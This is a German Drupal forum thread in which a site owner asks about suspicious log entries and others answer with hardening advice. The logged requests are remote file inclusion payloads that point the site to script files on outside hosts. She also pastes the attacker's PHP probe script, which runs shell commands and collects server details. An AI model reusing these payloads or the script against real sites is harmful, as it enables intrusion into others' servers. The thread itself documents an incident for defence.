?! Höchst merkwürdige Logeinträge!!
Eingetragen von Matilda (129)am 26.05.2009 - 19:36 Uhr in
Hallo zusammen,
ich bin alarmiert - habe gerade höchst merkwürdige Logeinträge gefunden, die ich nicht so ganz interpretieren kann. Ein Zurückverfolgen lässt mich aber versuchen, dass ich Besuch hatte oder der Versuch gestartet wurde??
Folgende Einträge:
Ort http://unseredomain.de/drupal/?q=blog//drupal/?_menu[callbacks][1][callback]=http://opall.fr//assets/snippets/reflect/kontol.txt?
Referrer
Nachricht blog//drupal/?_menu[callbacks][1][callback]=http://opall.fr//assets/snippets/reflect/kontol.txt?Ort http://unseredomain.de/drupal//?q=http://www.isomassage.de/web//moduls/t...??
Referrer
Nachricht http://www.isomassage.de/web//moduls/tirid.txt??Ort http://sin.sign-lang.uni-hamburg.de/drupal/?q=impressum.html//?q=http://...??
Referrer
Nachricht impressum.html//?q=http://www.isomassage.de/web//moduls/tirid.txt??Hinter dem letzten Eintrag verbirgt sich z.B. php-Code ... der letzte Absatz zeugt für mich von krimineller Energie!! Jemand hinterlässt wohl seine Marke und späht noch ein bischen aus!! Was mach ich nu??
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;- Anmelden oder Registrieren um Kommentare zu schreiben
Matilda schrieb Was mach
am 26.05.2009 - 19:50 Uhr
Was mach ich nu??
- deine Installation samt Modulen immer auf aktuellem Stand halten
- ggf. PHPIDS einsetzen (D5 Status weiß ich ausm Kopf nicht)
- ggf. serverseitig ModSecurity nutzen
- damit leben - Scans und Angriffe auf alle erdenklichen Services im Netz sind absolut Alltag
--
mortendk: everytime you use contemplate... Thor is striking down from above with his mighty hammer - crushing and killing a kitten!
webseiter.de
Suchmaschinenoptimierung (SEO) & Drupal
Vielen Dank für deine
am 26.05.2009 - 20:02 Uhr
Vielen Dank für deine schnelle Antwort!!
ok - a) mach ich, b) und c) prüfe ich nach, d) dachte ich mir doch ... und e) was sagt mir denn jetzt, dass das nur ein Versuch war bzw. woran würde ich erkennen, dass der Versuch erfolgreich war?
Grüße,
Matilda
zu e) Je nach Zielsetzung
am 26.05.2009 - 20:05 Uhr
zu e) Je nach Zielsetzung des Angreifers merkst du u.U. lange Zeit gar nichts.
--
mortendk: everytime you use contemplate... Thor is striking down from above with his mighty hammer - crushing and killing a kitten!
webseiter.de
Suchmaschinenoptimierung (SEO) & Drupal